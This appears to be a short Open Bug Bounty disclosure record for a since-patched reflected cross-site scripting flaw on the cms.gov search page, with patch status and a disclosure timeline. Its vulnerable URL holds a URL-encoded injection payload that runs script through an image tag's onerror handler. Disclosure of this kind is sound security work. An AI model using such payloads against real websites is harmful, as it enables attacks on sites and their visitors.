cms.gov XSS vulnerability

2015-08-21T06:01:00
ID OBB:80861
Type openbugbounty
Reporter bugs3ra
Modified 2015-08-21T06:04:00

Description

Vulnerable URL:
https://www.cms.gov/Newsroom/Search-Results/index.html?q=%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%28%2FXSSPOSED%2F%29%3E&filter;=Press%20Releases+Fact%20Sheets
Details:

Description| Value
---|---
Patched:| Yes, at 22.09.2015
Latest check for patch:| 22.09.2015 01:35 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 11692
Google Pagerank| 8
VIP website status:| Yes
Check cms.gov SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 21 August, 2015 06:01 GMT
Vulnerability existence verified and confirmed| 21 August, 2015 06:04 GMT